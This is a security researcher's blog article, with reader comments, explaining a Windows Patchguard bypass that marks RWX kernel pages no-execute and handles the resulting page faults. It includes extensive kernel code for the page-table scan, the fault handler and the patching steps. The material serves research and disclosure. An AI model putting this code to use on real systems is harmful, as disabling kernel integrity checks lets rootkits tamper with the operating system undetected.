PgC: Garbage collecting Patchguard away

I have released another article about Patchguard almost 5 years ago, ByePg, which was about exception hooking in the kernel, but let’s be frank, it didn’t entirely get rid of Patchguard; in this article I will be discussing an entirely different approach to bypass Patchguard, PgC.

Now there already is plenty of great research on Patchguard, Tetrane even released a 61-page whitepaper on all the intricacies of Patchguard. What makes PgC different is that it does not actually depend on how Patchguard works, but the very obvious principles of memory management. The advantage of this approach is that it is not defeating a specific version of Patchguard, but rather the entire concept of it. I’ll admit I have been sitting on this for a while, but I think it is now time to share it with the world, after almost 7 years, during which I only had to change a single line of code to update it (Hi KiSwInterruptDispatch 👋).

0x0: A stark contrast

There is only one thing we need to know about Patchguard in order to come up with an idea to defeat it: it runs on non-image pages and it decrypts itself on the fly.

Just by knowing this you should see where this is going when you recall that the Windows kernel, like any other modern operating system, absolutely hates the idea of RWX memory in Ring 0! It is a security nightmare after all, and Microsoft will not sign your driver if you have RWX sections in it. A case of do as I say, not as I do, interesting!

0x1: System VA types

Before we start engineering a solution to attack this very contrast, there is one more thing we should know about our beloved OS: how it likes to keep its memory arranged. Let’s play a little game. Go ahead and launch Process Hacker, or any other tool that shows you the image base of a kernel driver and pick a (non-session) driver and check its image base. Does it start with something close to 0xfffff803?

Admittedly, this was not the best party trick, but the point of it all is that the kernel manages each “type” of memory in different PXIs (PML4/PML5 indices). You can get an idea of how this all works from looking at the enum _MI_SYSTEM_VA_TYPE, within the MiVisibleState there is a neat little array called SystemVaType, mapping the upper 256 PXIs to a specific type of memory. Meaning that when you allocate a page, it isn’t reaaaly random where it ends up even if it is somewhat randomized each boot.

To give you an idea of each region of memory, here’s a snippet of the enum:

namespace mi
{
    // [enum _MI_SYSTEM_VA_TYPE]
    //  Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
    //
    enum class system_va_type_t : int32_t       
    {                                           
        unused =                        0x0,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        session_space =                 0x1,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        process_space =                 0x2,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        boot_loaded =                   0x3,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        pfn_database =                  0x4,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        non_paged_pool =                0x5,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        paged_pool =                    0x6,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_paged =            0x7,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_cache =                  0x8,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_ptes =                   0x9,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        hal =                           0xa,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        formerly_session_global_space = 0xb,      // Windows 11
        session_global_space =          0xb,      // Windows 10 v1607, Windows 10 v2004, Windows 10 v20H2
        driver_images =                 0xc,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_non_paged =        0xd,      // Windows 10 v1607
        system_ptes_large =             0xd,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        kernel_stacks =                 0xe,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //maximum_type =                0xe,      // Windows 10 v1607
        secure_non_paged_pool =         0xf,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //system_ptes_large =           0xf,      // Windows 10 v1607
        kernel_shadow_stacks =          0x10,     // Windows 11
        maximum_type =                  0x10,     // Windows 10 v2004, Windows 10 v20H2
        kasan =                         0x11,     // Windows 11
        //maximum_type =                0x12,     // Windows 11
    };                                          
};              

What this means is that, if we exclude the pages that are used for actual kernel images, and filter for RWX memory, what we end up is a very small subset of allocations, most likely either Patchguard or some rootkit you sadly have on your system.

0x2: GC

Big corporation might not like the fact that you really have the same privileges as their OS on your own machine, but (for the next few years at least) you do. So let’s just do a little garbage collection of our own and mark these pages no-execute.

scheduler::call_ipi( [ & ] ( auto barrier ) {
	barrier->up();

	// Determine the range we scan.
	//
	auto [range_min, range_max] = get_range( range_per_cpu );

	// Iterate all top level page table entires in kernel address space.
	//
	for ( size_t ipxe = 256; ipxe != 512; ipxe++ ) {
		// If ignored region, skip.
		//
		if ( mem::get_pxi_flags( ipxe ) & ignored_pxi_flags )
			continue;

		auto rec = [ & ] <auto N> ( auto&& self, uint64_t va, const_tag<N>, size_t imin, size_t imax )
		{
			auto pte = mem::get_pte( va, N );

			// Skip if not present.
			//
			if ( !pte->present )
				return;
			
			// If we did not reach the bottom level:
			//
			if constexpr ( N != 0 ) {
				// If directory:
				//
				if ( !pte->large_page ) {
					// Iterate all pt entries:
					//
					for ( size_t ipte = imin; ipte != imax; ipte++ )
						self( self, va | ( ipte << ( 12 + 9 * ( N - 1 ) ) ), const_tag<N - 1>{}, 0, 512 );
					return;
				}
				// If large page, skip if too large to be considered.
				//
				else if constexpr ( N > 1 ) {
					return;
				}
				// Fallthrough to page handling.
			}

			// Skip if not RWX.
			//
			if ( !pte->write || pte->execute_disable )
				return;

			// Skip if user-mode memory mapped to kernel.
			//
			if ( !is_kernel_va( mem::get_virtual_address( pte->page_frame_number << 12 ), true ) )
				return;

			// Disable execution.
			//
			atomic_bit_set( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
		};
		rec( rec, mem::make_cannonical( ipxe << ( mem::va_bits - 9 ) ), const_tag<mem::page_table_depth - 1>{}, range_min, range_max );
	}

	// Flush the TLB and return.
	//
	barrier->down();
	ia32::flush_tlb();
} );

This code more or less comes down to:

  1. Launch an IPI since we don’t want to race with the rest of the OS.
  2. Iterate all the kernel pages (indices 0x100 to 0x1ff).
  3. Skip the ones that could not have Patchguard, I’d recommend skipping SessionSpace, ProcessSpace, DriverImages, PagedPool and most importantly the Self-referencing index unless you want to triple fault.
  4. Skip the pages that are no-execute, write disabled or not present.
  5. Go ahead and flip the NX bit.

If this all goes right, you will bluescreen in two to three minutes, which is when the Patchguard would have decrypted itself and tried to run. ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Hurray?

0x3: Healing back our OS

We now need a hook on #PF. Remember, there is no Patchguard anymore so our job is very straight forward. You can switch the IDT and add your own page fault handler, inline hook MmAccessFault, whichever method you’d like, as long you do it quickly and right before our IPI.

The final step, even with zero prior knowledge on how Patchguard works is suprisingly simple. Just let it bluescreen a few times and look at the dump! You will notice that there is a few DPCs, all of which start with an XOR instruction and a worker at PASSIVE_LEVEL. The worker, we will suspend forever, and the DPC ones, well just return to whoever is calling without doing anything.

That was pretty much it. The entire source code comes down to essentially 200 lines and there is no more Patchguard.

static constexpr bool pgc_debug = is_debug_build() && true;
static constexpr bool pgc_disable_timer_dispatch = true;
static constexpr bool pgc_disable_dpc_dispatch =   true;
static constexpr bool pgc_disable_context_dpc =    true;
static constexpr auto ignored_pxi_flags = mem::va_image | mem::va_session | mem::va_process | mem::va_self_ref | mem::va_paged;
inline static bool is_va_ignored( any_ptr virtual_address ) { return mem::lookup_va_flags( virtual_address ) & ignored_pxi_flags; }

// The ISR handling Kernel-mode NX faults:
bool on_knx_fault( void* virtual_address, nt::trapframe* tf ) {
	// If ignored region, skip.
	//
	if ( is_va_ignored( virtual_address ) )
		return false;

	// Get IRQL, display details.
	//
	auto* stack = ( void** ) ( tf->rsp & ~7ull );
	irql_t irql = ia32::get_effective_irql( tf->rflags );
	if constexpr ( pgc_debug ) {
		log( "KNX Caught @ %p\n", tf->rip );
		log( "RSP:  %p\n", tf->rsp );
		log( "RAX:  %p\n", tf->rax );
		log( "RCX:  %p\n", tf->rcx );
		log( "RDX:  %p\n", tf->rdx );
		log( "RBX:  %p\n", tf->rbx );
		log( "RBP:  %p\n", tf->rbp );
		log( "R8:   %p\n", tf->r8 );
		log( "R9:   %p\n", tf->r9 );
		log( "R10:  %p\n", tf->r10 );
		log( "R11:  %p\n", tf->r11 );
		log( "IRQL: %d\n", irql );
		for ( uint64_t p = tf->rip; p < ( tf->rip + 32 ); ) {
			if ( !mem::is_address_valid( p ) || !mem::is_address_valid( p + 15 ) ) {
				break;
			}
			auto ins = xed::decode64( ( void* ) p );
			if ( !ins ) break;
			log( "%p: %s\n", p, ins->to_string() );
			p += ins->length();
		}
	}

	// Dispatch level or IPI level PatchGuard components:
	//
	if ( irql >= DISPATCH_LEVEL ) {
		uint8_t* bytes = ( uint8_t* ) tf->rip;

		// KiDpcDispatch/CmpAppendDllSection clone called from dummy DPCs, decrypts and calls into pg context.
		//
		if ( pgc_disable_context_dpc && !memcmp( bytes, "\x2E\x48\x31", 3 ) ) {
			if ( !mem::is_cannonical( tf->rdx ) ) {
				if ( tf->rcx == tf->rip ) {
					if constexpr ( pgc_debug )
						log( "Discarded CmpAppendDllSection DPC: %llx\n", tf->rip );
					tf->rip = *( uint64_t* ) tf->rsp;
					tf->rsp += 8;
					return true;
				}
			}
		} 
		else if ( pgc_disable_dpc_dispatch && !memcmp( bytes, "\x48\x31", 2 ) ) {
			if ( !mem::is_cannonical( tf->rdx ) ) {
				if ( ( tf->rip - 0x70 ) <= tf->rcx && tf->rcx <= ( tf->rip + 0x70 ) ) {
					if constexpr ( pgc_debug )
						log( "Discarded KiDpcDispatch DPC: %llx\n", tf->rip );
					tf->rip = *( uint64_t* ) tf->rsp;
					tf->rsp += 8;
					return true;
				}
			}
		}

		// KiTimerDispatch clone called from KiExecuteAllDpcs, decrypts and calls into pg context.
		//
		if constexpr ( pgc_disable_timer_dispatch ) {
			for ( int i = 0; i < 0x20; i++ ) {
				// pushfq
				if ( bytes[ i + 0 ] == 0x48 && bytes[ i + 1 ] == 0x9C ) {
					for ( int j = i; j < 0x20; j++ ) {
						// sub rsp
						if ( bytes[ j + 0 ] == 0x48 && bytes[ j + 1 ] == 0x83 ) {
							if constexpr ( pgc_debug )
								log( "Discarded KiTimerDispatch: %llx\n", tf->rip );
							tf->rip = *( uint64_t* ) tf->rsp;
							tf->rsp += 8;
							return true;
						}
					}
				}
			}
		}
	} else if ( ke::get_eprocess() == ntpp::get_initial_system_process() ) {
		// Deferred work item?
		//
		uint64_t last_valid_vpn = 0;
		for ( int i = 0; i < 0x20; i++ ) {
			// Validate stack pointer.
			//
			auto* value_ptr = &stack[ i ];
			if ( auto vpn = uint64_t( value_ptr ) >> 12; vpn != last_valid_vpn ) {
				if ( !mem::is_address_valid( value_ptr ) ) {
					break;
				}
				last_valid_vpn = vpn;
			}

			// Check if it matches the value we expected.
			//
			void* value = *value_ptr;
			if ( value != &ke::delay_execution_thread && value != &ke::wait_for_multiple_objects && value != &ke::wait_for_single_object ) {
				continue;
			}

			// Align stack
			tf->rsp &= ~0xF;
			// Set the arguments on stack
			tf->rcx = ( uint64_t ) nt::mode_t::kernel_mode;
			tf->rdx = false;
			*( int64_t* ) ( tf->r8 = ( tf->rsp + 0x28 ) ) = -0x11F0231A4F3000;
			// Simulate call [KeDelayExecutionThread]
			tf->rsp -= 8;
			*( uint64_t* ) tf->rsp = tf->rip;
			tf->rip = ( uint64_t ) &ke::delay_execution_thread;
		
			// Lower IRQL and return.
			//
			if constexpr ( pgc_debug )
				log( "Suspended PatchGuard worker thread: %llx\n", ntpp::get_client_id().unique_thread );
			ia32::set_irql( APC_LEVEL );
			tf->rflags.interrupt_enable_flag = true;
			return true;
		}
	}

	// False positive, fix NX and continue.
	//
	auto [pte, _] = mem::lookup_pte( virtual_address );
	atomic_bit_reset( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
	return true;
}


// Initializes the patchguard bypass.
//
void init() {
	// Fetch the number of processors and distribute the work.
	//
	static const uint16_t num_processors = ( uint16_t ) apic::number_of_processors();
	static const uint16_t range_per_cpu = 512 / num_processors;
	static constexpr auto get_range = [ ] ( uint16_t range_per_cpu ) -> std::pair<uint16_t, uint16_t> {
		// [ idx*R, (idx+1)*R ]
		uint16_t rmin = uint16_t( ia32::read_pcid() ) * range_per_cpu;
		uint16_t rmax = rmin + range_per_cpu;
		
		// If last range, round to max.
		if ( ( rmax + range_per_cpu ) >= 512 )
			rmax = 512;
		
		return { rmin, rmax };
	};
	
	// Add the patches and call the IPI.
	//
	if ( sdk::exists( ki::sw_interrupt_dispatch ) )
		hook::patch( &ki::sw_interrupt_dispatch, { 0xC3 } );
	if ( sdk::exists( ki::mca_deferred_recovery_service ) )
		hook::patch( &ki::mca_deferred_recovery_service, { 0xC3 } );
	scheduler::call_ipi( [ & ] ( auto barrier ) {
		// .... See above
	} );
}

As it stands right now, the code base is not yet ready for release due to the vast amount of dependencies on bits and pieces of my libraries (C runtime, the hooking library, ISRs…), but I will try to release a standalone version of PgC in the near future. You can find some of the memory utilities used above at Github.

I hope you enjoyed this article and the trick even more. If you have any questions, feel free to ask them on the bird app or the comments below.

Share

Security researcher and reverse engineer.
Interested in Windows kernel development, low-level programming, static program analysis and cryptography.

9 Comments

    1. Can Bölük Post author Reply

      If it’s a passive worker, then it’s fine as you can suspend it on return. DPC will indeed crash but as it runs for ~2ms every 5 minutes, the chance of you hitting that race window is very unlikely, ~0.0006%.

  1. sasha Reply

    Thanks, this has been a very good read (as expected from you). I\’ve been diving into PG recently starting with the Tetrane paper and, based on your code, it seems like the ways to execute PG code remains the same, 5 years after the article. I figured they would\’ve kept tweaking it since then and invent new ways to obfuscate the execution, but I suppose MS (sort of) gave up to focus on HVCI and the like.

  2. Friday50 Reply

    Hi Can Bölük,

    Can I translate and repost your article on my blog? I’ll include your name and a link to the original post.

    Thanks!

  3. jay Reply

    Given that this technology is quite old and not actively used, I can discuss it more. First, enumerate the system memory regions; PG only exists in two of these areas. Then, in the IPI, hook #PF and set the NX attribute for these regions. Finally, I use emulation to simulate the code trying to execute in #PF and fake memory access. In fact, PG only uses mov and xor to access memory for integrity checks, making it easy to emulate.

Leave a Reply

Your email address will not be published. Required fields are marked *